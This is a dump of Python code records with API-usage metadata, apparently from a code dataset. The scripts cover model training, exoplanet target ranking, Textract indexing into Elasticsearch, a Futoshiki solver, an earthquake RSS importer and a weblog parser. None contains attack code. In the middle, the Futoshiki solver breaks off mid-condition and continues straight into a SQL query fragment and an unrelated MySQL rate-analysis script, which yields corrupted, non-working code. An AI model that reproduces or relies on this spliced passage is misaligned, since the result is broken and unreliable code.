3447, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "scipy.stats.poisson.cdf", "line_number": 47, "usage_type": "call"}, {"api_name": "scipy.stats.poisson", "line_number": 47, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 47, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 48, "usage_type": "call"}, {"api_name": "scipy.stats.poisson.cdf", "line_number": 48, "usage_type": "call"}, {"api_name": "scipy.stats.poisson", "line_number": 48, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 48, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 49, "usage_type": "call"}, {"api_name": "scipy.stats.poisson.cdf", "line_number": 49, "usage_type": "call"}, {"api_name": "scipy.stats.poisson", "line_number": 49, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 49, "usage_type": "name"}, {"api_name": "numpy.abs", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 59, "usage_type": "call"}, {"api_name": "scipy.stats.poisson.cdf", "line_number": 63, "usage_type": "call"}, {"api_name": "scipy.stats.poisson", "line_number": 63, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 63, "usage_type": "name"}, {"api_name": "scipy.optimize.brentq", "line_number": 64, "usage_type": "call"}, {"api_name": "scipy.optimize", "line_number": 64, "usage_type": "name"}, {"api_name": "numpy.allclose", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "190689234", "text": "\nimport os\nimport logging\nimport torch\nimport argparse\n\nfrom typing import Union\nfrom pathlib import Path\n\nfrom gen_utils import set_logger_defaults\nfrom models import PyTorchModel\nfrom trainer import Trainer\n\nlogger = logging.getLogger(__name__)\nset_logger_defaults(logger)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n \n parser.add_argument(\n '--output_data_dir', '-o', type=str, \n default=os.environ['SM_OUTPUT_DATA_DIR']\n )\n parser.add_argument(\n '--model_dir', '-m', type=str, \n default=os.environ['SM_MODEL_DIR']\n )\n parser.add_argument(\n '--train_dir', '-t', type=str, \n default=os.environ['SM_CHANNEL_TRAIN_DIR']\n )\n parser.add_argument(\n '--val_dir', '-v', type=str, \n default=os.environ['SM_CHANNEL_VAL_DIR']\n )\n \n parser.add_argument('--outcome', '-O', type=str, default='first_sold_price')\n parser.add_argument('--batch_size', '-b', type=int, default=64)\n parser.add_argument('--epochs', '-e', type=int, default=10)\n \n args = parser.parse_args()\n \n logger.info(f'command-line args: {args}')\n \n trainer = Trainer()\n trainer.make_data_loader(\n which_loader='train', path=args.train_dir, batch_size=args.batch_size, \n outcome=args.outcome, concat_all=True, data_file=None\n )\n x_tab_input_dim, x_text_input_dim, x_img_input_dim = trainer.get_input_dims()\n \n model = PyTorchModel(x_tab_input_dim, x_text_input_dim, x_img_input_dim)\n \n trainer.make_data_loader(\n which_loader='val', path=args.val_dir, batch_size=args.batch_size,\n outcome=args.outcome, concat_all=True, data_file=None\n )\n \n model_params_path = args.model_dir + '/model_params.pt'\n \n trainer.set_model(\n model=model, loss_func_cls=torch.nn.L1Loss, \n optimizer_cls=torch.optim.Adam, lr=1e-5\n )\n trainer.train(epochs=args.epochs)\n \n with open(model_params_path, 'wb') as file:\n torch.save(trainer.model.cpu().state_dict(), file)\n logger.info(f'Model state_dict saved to {model_params_path}')\n\n", "sub_path": "model/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 2114, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 14, "usage_type": "call"}, {"api_name": "gen_utils.set_logger_defaults", "line_number": 15, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 19, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 35, "usage_type": "attribute"}, {"api_name": "trainer.Trainer", "line_number": 46, "usage_type": "call"}, {"api_name": "trainer.make_data_loader", "line_number": 47, "usage_type": "call"}, {"api_name": "trainer.get_input_dims", "line_number": 51, "usage_type": "call"}, {"api_name": "models.PyTorchModel", "line_number": 53, "usage_type": "call"}, {"api_name": "trainer.make_data_loader", "line_number": 55, "usage_type": "call"}, {"api_name": "trainer.set_model", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 63, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 64, "usage_type": "attribute"}, {"api_name": "trainer.train", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 69, "usage_type": "call"}, {"api_name": "trainer.model.cpu", "line_number": 69, "usage_type": "call"}, {"api_name": "trainer.model", "line_number": 69, "usage_type": "attribute"}]} +{"seq_id": "163449337", "text": "'''\nThis script uses functions from X_ranking.py to create an initial target list to\ninput to the TKS prioritization algorithm. It ranks targets based on the \"X\" metric,\nwhich is the ratio of the target's TSM and t_HIRES, the expected total exposure\ntime needed to achieve a 5-sigma mass measurement on the system.\n\nNotes:\n - Right now (03/24/20), the program does not incorporate information from Jump.\n Though, information that would be useful to have from Jump includes:\n - The number of observations a target already has, so we can deduct the\n proper amount of time from t_HIRES since these targets have a \"head start\"\n - Parameters used for prior observations e.g.\n - N_shots (number of shots be observation)\n - exposure_meter_target (target number of exposure meter counts)\n - If a target already has RVs, an estimate of the typical RV measurement\n precision, measured from the error bars on the RV points themselves.\n - If a target already has a mass measurement from RadVel, an updated calculation\n of t_HIRES, extrapolated from the number of current observations and\n SNR of the mass measurement.\n - The first two bullet points can be gathered from data using an SQL\n query to Jump. Getting the actual mass precision would be a little\n more involved because it's not already in a Jump database. Maybe,\n since there aren't all that many prioritized targets, these measurements\n could be collated by hand in a .csv somewhere.\n'''\n# System\nimport os\nimport sys\nimport argparse\nimport numpy as np\nimport pandas as pd\n\nfrom X_ranking import get_target_list\n\n# Command line arguments. For most uses, the defaults will be fine.\nparser = argparse.ArgumentParser(description='Rank targets in selected_TOIs.')\nparser.add_argument('save_fname', type=str, default=None, help='File save path for output.')\nparser.add_argument('--save_folder', type=str, default='data/sc3_target_lists/', help='Folder where the output will be saved.')\nparser.add_argument('--toi_folder', type=str, default='data/toi/', help='Folder with toi+ lists.')\nparser.add_argument('--tic_folder', type=str, default='data/exofop/', help='Folder with TIC info.')\nparser.add_argument('--selected_TOIs_folder', type=str, default='data/TKS/', help='Folder with selected_TOIs csv.')\nparser.add_argument('--include_qlp', type=str, default='False', help='Include QLP TOIs in ranking algorithm?')\nparser.add_argument('--verbose', type=str, default='True', help='Print additional messages during target list generation?')\nparser.add_argument('--num_to_rank', type=str, default='5', help='Number of targets to assign priorities to per bin.')\nparser.add_argument('--k_amp_cut', type=float, default=0., help='Minimum expected K-amplitude that targets must have to make the final list.')\nparser.add_argument('--min_TSM', type=float, default=0., help='Minimum TSM value that targets must have to make the final list.')\n\ndef save_to_csv(df, save_fname, save_folder):\n '''\n Save the df to file.\n '''\n df.to_csv(save_folder + save_fname)\n print('The target list was saved to {}.'.format(save_fname))\n\ndef mark_vip_targets(df, vip_fname):\n '''\n Add a column to the DataFrame signifying a VIP priority for certain targets that\n we want to send directly to the top of our priority list, regardless of other\n sorting methods.\n '''\n if vip_fname is not '':\n vip_list = np.loadtxt(vip_fname, dtype=str)\n data = zip(vip_list, np.arange(1, len(vip_list)+1))\n cols = ['cps', 'vip_rank']\n vip_df = pd.DataFrame(data, columns=cols)\n\n # Merge the X_tois_df with the vip_df while preserving the indexes on the X_tois_df, which contain binning info\n return df.reset_index().merge(vip_df, how='left', left_on='cps', right_on='cps').set_index(df.index.names)\n else:\n df['vip_rank'] = np.nan # Make vip_rank column empty is no file given\n return df\n\nif __name__ == '__main__':\n\n args = parser.parse_args()\n save_fname = args.save_fname\n save_folder = args.save_folder\n toi_folder = args.toi_folder\n tic_folder = args.tic_folder\n selected_TOIs_folder = args.selected_TOIs_folder\n num_to_rank = int(args.num_to_rank)\n k_amp_cut = float(args.k_amp_cut)\n min_TSM = float(args.min_TSM)\n\n # Convert these optional arguments to other data types, if they're specified.\n include_qlp_str = args.include_qlp\n assert include_qlp_str.lower() in ['false', 'true'], '--include_qlp must be either True or False'\n include_qlp = False\n if include_qlp_str.lower() == 'false':\n include_qlp = False\n elif include_qlp_str.lower() == 'true':\n include_qlp = True\n\n verbose_str = args.verbose\n assert verbose_str.lower() in ['false', 'true'], '--verbose must be either True or False'\n verbose = None\n if verbose_str.lower() == 'false':\n verbose = False\n elif verbose_str.lower() == 'true':\n verbose = True\n\n # Get the initial target list\n print('Generating initial target list...')\n print('')\n X_tois_df = get_target_list(save_fname=None, toi_folder=toi_folder, tic_folder=tic_folder, selected_TOIs_folder=selected_TOIs_folder, include_qlp=include_qlp, verbose=verbose, num_to_rank=num_to_rank, k_amp_cut=k_amp_cut, min_TSM=min_TSM)\n print('----------')\n\n # Add VIP targets\n print('Would you like to mark VIP targets that will get selected first? y/n')\n vip_yn_valid = False\n while not vip_yn_valid:\n vip_yn = input().lower()\n if vip_yn in ['yes', 'y']:\n vip_yn_valid = True\n sys.stdout.write(\"Provide the path to the .txt file with your VIP targets' CPS IDs listed one per row, in order of highest VIP to lowest: \")\n vip_path_valid = False\n while not vip_path_valid:\n vip_fname = input()\n if os.path.exists(vip_fname):\n vip_path_valid = True\n else:\n print('')\n print('That is not a valid path, enter another...')\n X_tois_df = mark_vip_targets(X_tois_df, vip_fname)\n save_to_csv(X_tois_df, save_fname, save_folder)\n elif vip_yn in ['no', 'n']:\n vip_yn_valid = True\n X_tois_df = mark_vip_targets(X_tois_df, '') # Add the vip_rank column but leave it empty\n save_to_csv(X_tois_df, save_fname, save_folder)\n else:\n print('Please enter yes or no...')\n print('----------')\n", "sub_path": "target_list_script.py", "file_name": "target_list_script.py", "file_ext": "py", "file_size_in_byte": 6601, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 63, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 70, "usage_type": "attribute"}, {"api_name": "X_ranking.get_target_list", "line_number": 105, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 115, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 115, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 119, "usage_type": "call"}, {"api_name": "os.path", "line_number": 119, "usage_type": "attribute"}]} +{"seq_id": "193054941", "text": "import json\nfrom helper import FileHelper, S3Helper\nfrom trp import Document\nimport boto3\nfrom elasticsearch import Elasticsearch, RequestsHttpConnection\nfrom requests_aws4auth import AWS4Auth\nfrom datetime import datetime\n\nclass OutputGenerator:\n def __init__(self, documentId, response, bucketName, objectName, forms, tables, ddb):\n self.documentId = documentId\n self.response = response\n self.bucketName = bucketName\n self.objectName = objectName\n self.forms = forms\n self.tables = tables\n self.ddb = ddb\n\n self.outputPath = \"{}-analysis/{}/\".format(objectName, documentId)\n\n self.document = Document(self.response)\n\n def indexDocument(self, bucketName, opath, text):\n objectName = self.objectName;\n items = objectName.rsplit('/', 1)\n if len(items) > 1:\n name = objectName.rsplit('/', 1)[1]\n elif len(items) == 1:\n name = objectName.rsplit('/', 1)[0]\n elif len(items) >=0:\n name = \"UNKNOWN-2019010101\"\n\n parts = name.split('_')[0];\n print(parts)\n claimId = parts.split('-')[0]\n if len(parts.split('-'))==1:\n date = \"20190101\"\n elif len(parts.split('-')) > 1:\n date = parts.split('-')[1][0:8]\n\n\n # Update host with endpoint of your Elasticsearch cluster\n #host = \"search--xxxxxxxxxxxxxx.us-east-1.es.amazonaws.com\n host = \"search-custom-e4gpteganu5jmvurcd7xymc4hi.us-east-1.es.amazonaws.com\"\n region = 'us-east-1'\n\n if(text):\n service = 'es'\n ss = boto3.Session()\n credentials = ss.get_credentials()\n region = ss.region_name\n\n awsauth = AWS4Auth(credentials.access_key, credentials.secret_key, region, service, session_token=credentials.token)\n\n\n es = Elasticsearch(\n hosts = [{'host': host, 'port': 443}],\n http_auth = awsauth,\n use_ssl = True,\n verify_certs = True,\n connection_class = RequestsHttpConnection\n )\n s3path = \"https://\"+bucketName+\".s3.amazonaws.com/\"+objectName\n\n document = {\n \"name\": \"{}\".format(objectName),\n \"bucket\" : \"{}\".format(bucketName),\n \"content\" : text,\n \"claimid\" : claimId,\n \"date\" : date,\n \"s3path\" : s3path,\n \"fileName\": name\n }\n\n es.index(index=\"textract\", doc_type=\"document\", id=opath, body=document)\n\n print(\"Indexed document\")\n\n def saveItem(self, pk, sk, output):\n\n jsonItem = {}\n jsonItem['documentId'] = pk\n jsonItem['outputType'] = sk\n jsonItem['outputPath'] = output\n\n self.ddb.put_item(Item=jsonItem)\n\n def _outputText(self, page, p):\n #text = page.text\n text = page.getTextInReadingOrder()\n opath = \"{}page-{}-text.txt\".format(self.outputPath, p)\n S3Helper.writeToS3(text, self.bucketName, opath)\n self.saveItem(self.documentId, \"page-{}-Text\".format(p), opath)\n self.indexDocument(self.bucketName, opath, text)\n\n # textInReadingOrder = page.getTextInReadingOrder()\n # opath = \"{}page-{}-text-inreadingorder.txt\".format(self.outputPath, p)\n # S3Helper.writeToS3(textInReadingOrder, self.bucketName, opath)\n # self.saveItem(self.documentId, \"page-{}-TextInReadingOrder\".format(p), opath)\n\n def _outputForm(self, page, p):\n csvData = []\n for field in page.form.fields:\n csvItem = []\n if(field.key):\n csvItem.append(field.key.text)\n else:\n csvItem.append(\"\")\n if(field.value):\n csvItem.append(field.value.text)\n else:\n csvItem.append(\"\")\n csvData.append(csvItem)\n csvFieldNames = ['Key', 'Value']\n opath = \"{}page-{}-forms.csv\".format(self.outputPath, p)\n S3Helper.writeCSV(csvFieldNames, csvData, self.bucketName, opath)\n self.saveItem(self.documentId, \"page-{}-Forms\".format(p), opath)\n\n def _outputTable(self, page, p):\n\n csvData = []\n for table in page.tables:\n csvRow = []\n csvRow.append(\"Table\")\n csvData.append(csvRow)\n for row in table.rows:\n csvRow = []\n for cell in row.cells:\n csvRow.append(cell.text)\n csvData.append(csvRow)\n csvData.append([])\n csvData.append([])\n\n opath = \"{}page-{}-tables.csv\".format(self.outputPath, p)\n S3Helper.writeCSVRaw(csvData, self.bucketName, opath)\n self.saveItem(self.documentId, \"page-{}-Tables\".format(p), opath)\n\n def run(self):\n\n if(not self.document.pages):\n return\n\n opath = \"{}response.json\".format(self.outputPath)\n S3Helper.writeToS3(json.dumps(self.response), self.bucketName, opath)\n self.saveItem(self.documentId, 'Response', opath)\n\n print(\"Total Pages in Document: {}\".format(len(self.document.pages)))\n\n docText = \"\"\n\n p = 1\n for page in self.document.pages:\n\n opath = \"{}page-{}-response.json\".format(self.outputPath, p)\n S3Helper.writeToS3(json.dumps(page.blocks), self.bucketName, opath)\n self.saveItem(self.documentId, \"page-{}-Response\".format(p), opath)\n\n self._outputText(page, p)\n\n docText = docText + page.text + \"\\n\"\n\n if(self.forms):\n self._outputForm(page, p)\n\n if(self.tables):\n self._outputTable(page, p)\n\n p = p + 1", "sub_path": "textract-pipeline/lambda/textractor/python/og.py", "file_name": "og.py", "file_ext": "py", "file_size_in_byte": 5701, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "trp.Document", "line_number": 21, "usage_type": "call"}, {"api_name": "boto3.Session", "line_number": 49, "usage_type": "call"}, {"api_name": "requests_aws4auth.AWS4Auth", "line_number": 53, "usage_type": "call"}, {"api_name": "elasticsearch.Elasticsearch", "line_number": 56, "usage_type": "call"}, {"api_name": "elasticsearch.RequestsHttpConnection", "line_number": 61, "usage_type": "name"}, {"api_name": "helper.S3Helper.writeToS3", "line_number": 92, "usage_type": "call"}, {"api_name": "helper.S3Helper", "line_number": 92, "usage_type": "name"}, {"api_name": "helper.S3Helper.writeCSV", "line_number": 116, "usage_type": "call"}, {"api_name": "helper.S3Helper", "line_number": 116, "usage_type": "name"}, {"api_name": "helper.S3Helper.writeCSVRaw", "line_number": 135, "usage_type": "call"}, {"api_name": "helper.S3Helper", "line_number": 135, "usage_type": "name"}, {"api_name": "helper.S3Helper.writeToS3", "line_number": 144, "usage_type": "call"}, {"api_name": "helper.S3Helper", "line_number": 144, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 144, "usage_type": "call"}, {"api_name": "helper.S3Helper.writeToS3", "line_number": 155, "usage_type": "call"}, {"api_name": "helper.S3Helper", "line_number": 155, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 155, "usage_type": "call"}]} +{"seq_id": "557002269", "text": "# Template for the algorithm to solve a Futoshiki. Builds a recursive backtracking solution\n# that branches on possible values that could be placed in the next empty cell. \n# Initial pruning of the recursion tree - \n# we don't continue on any branch that has already produced an inconsistent solution\n# we stop and return a complete solution once one has been found\n\nimport pygame, Snapshot, Cell, Futoshiki_IO,time,os\n\ndef solve(snapshot, screen):\n # display current snapshot\n Futoshiki_IO.displayPuzzle(snapshot, screen)\n pygame.display.flip()\n unequlitys=snapshot.getConstraints()\n less={}\n greater={}\n for x in unequlitys:\n if(x[1] in greater.keys()):\n greater[x[1]].append(x[0])\n else:\n greater[x[1]]=[x[0]]\n\n if (x[0] in less.keys()):\n less[x[0]].append(x[1])\n else:\n less[x[0]] = [x[1]]\n\n print(greater)\n print(less)\n\n def printG(f):\n for x in f:\n print(x)\n print(\"--------------\")\n\n\n def minVal(grid,x,y):\n if((x,y) in greater.keys()):\n gr8=greater[(x,y)]\n vals=[]\n # print(\"-- mins\")\n for i in gr8:\n # print(x)\n vals.append(grid[i[0]][i[1]])\n # print(grid[x[0]][x[1]])\n # print(vals)\n\n return (max(vals))\n\n else:\n return 0\n\n def maxVal(grid,x,y):\n if((x,y)in less.keys()):\n les=less[(x,y)]\n # print(\"-- maxs\")\n vals=[]\n for i in les:\n t=grid[i[0]][i[1]]\n if(t>0):\n vals.append(grid[i[0]][i[1]])\n # print(vals)\n # print(min(vals))\n if(len(vals)!=0):\n men = min(vals)\n return men\n return 6\n\n\n def gridtosnap(grid):\n for x in range(5):\n for y in range(5):\n snapshot.setCellVal(x, y,grid[x][y])\n Futoshiki_IO.displayPuzzle(snapshot, screen)\n\n def possibleEntries(board, i, j):#returns valid values\n\n possibilityArray = {}\n\n for x in range(1, 6):\n possibilityArray[x] = 0\n\n # For horizontal entries\n for y in range(0, 5):\n if not board[i][y] == 0:\n possibilityArray[board[i][y]] = 1\n\n # For vertical entries\n for x in range(0, 5):\n if not board[x][j] == 0:\n possibilityArray[board[x][j]] = 1\n\n\n\n for x in range(1, 6):\n if possibilityArray[x] == 0:\n possibilityArray[x] = x\n else:\n possibilityArray[x] = 0\n\n return possibilityArray\n\n def FSolver(board):#recursive function\n\n # printG()\n i = 0\n j = 0\n\n possiblities = {}\n\n # if board is full, there is no need to solve it any furtherbreak\n if isComplete(board):\n print(\"Board Solved Successfully!\")\n\n gridtosnap(grid)\n Futoshiki_IO.displayPuzzle(snapshot, screen)\n pygame.display.flip()\n\n\n\n return True\n else:\n # find the first vacant spot\n for x in range(4, -1,-1):\n for y in range(0,5):\n if board[x][y] == 0:\n i = x\n j = y\n break\n\n\n\n # get all the possibilities for i,j\n possiblities = possibleEntries(board, i, j)\n\n # go through all the possibilities and call the the function\n # again and again\n une=[]\n\n min = minVal(grid,i,j)\n max = maxVal(grid,i,j)\n for x in range(1, 6):\n\n if not possiblities[x] == 0 and x>min and x 1448482991 and pi0_id < 1453321409;')\ndeviceData = sqlCursor.fetchall()\n\nlTime = []\nlRate = []\n\n\nfor i, row in enumerate(deviceData):\n\tif float(row[1]) < 800:\n\t\tcontinue\n\tlTime.append(float(row[0]))\n\tlRate.append(float(row[1]))\n\nnumPoints = len(lTime)\naTime = np.asarray(lTime)\naRate = np.asarray(lRate)\n\nc1 = Canvas()\n\ngRate = root.TGraph(numPoints, aTime, aRate)\ngRate.Draw('AP')\n\n\nc1.Update()\n\nraw_input('Press enter to continue...')\n\n\n", "sub_path": "nr/time_dependence/rate_analysis.py", "file_name": "rate_analysis.py", "file_ext": "py", "file_size_in_byte": 988, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "MySQLdb.connect", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 37, "usage_type": "call"}, {"api_name": "rootpy.plotting.Canvas", "line_number": 39, "usage_type": "call"}, {"api_name": "ROOT.TGraph", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "119795658", "text": "import re\nfrom datetime import datetime\nfrom xml.etree import ElementTree\n\nimport requests\nfrom django.core.management import BaseCommand\nfrom django.utils.timezone import make_aware\n\nfrom earthquake_visualizer.models import EarthQuakeFeed\n\nURI = r'https://www.emsc.eu/service/rss/rss.php?typ=emsc&min_lat=10&min_long=-30&max_long=65'\nPRIMARY_KEY_REGEX = re.compile(r'https://www.emsc.eu/Earthquake/earthquake\\.php\\?id=(\\d*)')\nMAGNITUDE_REGEX = re.compile(r'.*(\\d\\.\\d)')\nCOUNTRY = 'CROATIA'\n\n\ndef _get_pk(link):\n return int(PRIMARY_KEY_REGEX.findall(link)[0])\n\n\ndef _get_magnitude(magnitude):\n return MAGNITUDE_REGEX.findall(magnitude)[0]\n\n\ndef _get_time(time):\n return make_aware(datetime.strptime(time, \"%Y-%m-%d %H:%M:%S %Z\"))\n\n\ndef _parse_feed(rss_feed):\n namespace = {\n 'geo': 'http://www.w3.org/2003/01/geo/',\n 'emsc': 'https://www.emsc.eu'\n }\n root = ElementTree.fromstring(rss_feed.text)\n for item in root.iter('item'):\n yield {\n 'id': _get_pk(item.find('link').text),\n 'title': item.find('title').text,\n 'latitude': item.find('geo:lat', namespace).text,\n 'longitude': item.find('geo:long', namespace).text,\n 'magnitude': _get_magnitude(item.find('emsc:magnitude', namespace).text),\n 'time': _get_time(item.find('emsc:time', namespace).text)\n }\n\n\nclass Command(BaseCommand):\n help = 'Retrieves rss feed data and updates the database.'\n\n def handle(self, *args, **options):\n rss_feed = requests.get(URI)\n if rss_feed.status_code != requests.codes.OK:\n self.stderr.write('rss feed data unavailable')\n return\n\n created, updated = 0, 0\n for item in _parse_feed(rss_feed):\n # if COUNTRY not in item['title']:\n # continue\n try:\n obj = EarthQuakeFeed.objects.get(id=item['id'])\n for key, value in item.items():\n setattr(obj, key, value)\n obj.save()\n updated += 1\n except EarthQuakeFeed.DoesNotExist:\n EarthQuakeFeed.objects.create(**item)\n created += 1\n self.stdout.write(f'Created {created}, updated {updated} records')\n", "sub_path": "earthquake_visualizer/management/commands/rssfeed.py", "file_name": "rssfeed.py", "file_ext": "py", "file_size_in_byte": 2261, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "re.compile", "line_number": 12, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 13, "usage_type": "call"}, {"api_name": "django.utils.timezone.make_aware", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 26, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.fromstring", "line_number": 34, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 34, "usage_type": "name"}, {"api_name": "django.core.management.BaseCommand", "line_number": 46, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 50, "usage_type": "call"}, {"api_name": "requests.codes", "line_number": 51, "usage_type": "attribute"}, {"api_name": "earthquake_visualizer.models.EarthQuakeFeed.objects.get", "line_number": 60, "usage_type": "call"}, {"api_name": "earthquake_visualizer.models.EarthQuakeFeed.objects", "line_number": 60, "usage_type": "attribute"}, {"api_name": "earthquake_visualizer.models.EarthQuakeFeed", "line_number": 60, "usage_type": "name"}, {"api_name": "earthquake_visualizer.models.EarthQuakeFeed.DoesNotExist", "line_number": 65, "usage_type": "attribute"}, {"api_name": "earthquake_visualizer.models.EarthQuakeFeed", "line_number": 65, "usage_type": "name"}, {"api_name": "earthquake_visualizer.models.EarthQuakeFeed.objects.create", "line_number": 66, "usage_type": "call"}, {"api_name": "earthquake_visualizer.models.EarthQuakeFeed.objects", "line_number": 66, "usage_type": "attribute"}, {"api_name": "earthquake_visualizer.models.EarthQuakeFeed", "line_number": 66, "usage_type": "name"}]} +{"seq_id": "391676807", "text": "# Copyright 2016 SDNMAX, Inc.\n# All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom flask import abort\n\nfrom yacore import db\nfrom yacore.fabric.models import DockerContainer\n\n\nclass YABGPContainer(DockerContainer):\n \"\"\" yabgp Docker containers\"\"\"\n __tablename__ = 'yabgp_container'\n id = db.Column(db.Integer, db.ForeignKey('docker_container.id'), primary_key=True)\n remote_addr = db.Column(db.Integer)\n __mapper_args__ = {\n 'polymorphic_identity': 'yabgp',\n }\n\n @staticmethod\n def create(data):\n \"\"\"Create a fabric host.\"\"\"\n yabgp_container = YABGPContainer()\n yabgp_container.from_dict(data)\n return yabgp_container\n\n def from_dict(self, data):\n \"\"\"Import fabric host data from a dictionary.\"\"\"\n for field in ['container_id', 'container_name', 'fabhost_id'\n 'remote_addr', 'local_addr', 'remote_as', 'local_as']:\n try:\n setattr(self, field, data[field])\n except KeyError:\n abort(400)\n", "sub_path": "yacore/fabric/container/yabgp/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 1585, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "yacore.fabric.models.DockerContainer", "line_number": 22, "usage_type": "name"}, {"api_name": "yacore.db.Column", "line_number": 25, "usage_type": "call"}, {"api_name": "yacore.db", "line_number": 25, "usage_type": "name"}, {"api_name": "yacore.db.Integer", "line_number": 25, "usage_type": "attribute"}, {"api_name": "yacore.db.ForeignKey", "line_number": 25, "usage_type": "call"}, {"api_name": "yacore.db.Column", "line_number": 26, "usage_type": "call"}, {"api_name": "yacore.db", "line_number": 26, "usage_type": "name"}, {"api_name": "yacore.db.Integer", "line_number": 26, "usage_type": "attribute"}, {"api_name": "flask.abort", "line_number": 45, "usage_type": "call"}]} +{"seq_id": "68417604", "text": "import os\nimport numpy as np\nfrom astropy import table\nfrom astropy import units as u\nimport re\n\ndef get_human_readable_name(weblog):\n\n for directory, dirnames, filenames in os.walk(weblog):\n if 't2-1_details.html' in filenames:\n #print(\"Found {0}:{1}\".format(directory, \"t2-1_details.html\"))\n with open(os.path.join(directory, 't2-1_details.html')) as fh:\n txt = fh.read()\n\n max_baseline = re.compile(\"Max Baseline\\s*([0-9a-z\\. ]*)\").search(txt).groups()[0]\n max_baseline = u.Quantity(max_baseline)\n\n array_name = ('7MorTP' if max_baseline < 100*u.m else 'TM2'\n if max_baseline < 1000*u.m else 'TM1')\n #print(\"array_name = {0}\".format(array_name))\n break\n\n for directory, dirnames, filenames in os.walk(weblog):\n if 't2-2-3.html' in filenames:\n with open(os.path.join(directory, 't2-2-3.html')) as fh:\n txt = fh.read()\n array_table = table.Table.read(txt, format='ascii.html')\n antenna_size, = map(int, set(array_table['Diameter']))\n break\n\n for directory, dirnames, filenames in os.walk(weblog):\n if 't2-2-2.html' in filenames:\n with open(os.path.join(directory, 't2-2-2.html')) as fh:\n txt = fh.read()\n\n array_table = table.Table.read(txt, format='ascii.html')\n band_string, = set(array_table['Band'])\n band = int(band_string.split()[-1])\n break\n\n for directory, dirnames, filenames in os.walk(weblog):\n if 't2-2-1.html' in filenames:\n with open(os.path.join(directory, 't2-2-1.html')) as fh:\n txt = fh.read()\n\n array_table = table.Table.read(txt, format='ascii.html')\n mask = np.array(['TARGET' in intent for intent in array_table['Intent']], dtype='bool')\n source_name, = set(array_table[mask]['Source Name'])\n break\n\n if array_name == '7MorTP':\n if antenna_size == 7:\n array_name = '7M'\n elif antenna_size == 12:\n array_name = 'TP'\n else:\n raise\n\n sbname = \"{0}_a_{1:02d}_{2}\".format(source_name, band, array_name, )\n\n print(sbname, max_baseline)\n\n return sbname\n\ndef weblog_names(list_of_weblogs):\n return {get_human_readable_name(weblog): weblog\n for weblog in list_of_weblogs}\n\ndef make_links(weblog_maps):\n reverse_map = {v:k for k,v in weblog_maps.items()}\n assert len(reverse_map) == len(weblog_maps)\n\n for k,v in weblog_maps.items():\n try:\n os.symlink('../{0}'.format(v), 'humanreadable/{0}'.format(k))\n except FileExistsError:\n pass\n", "sub_path": "reduction/parse_weblog.py", "file_name": "parse_weblog.py", "file_ext": "py", "file_size_in_byte": 2746, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.walk", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 15, "usage_type": "call"}, {"api_name": "astropy.units.Quantity", "line_number": 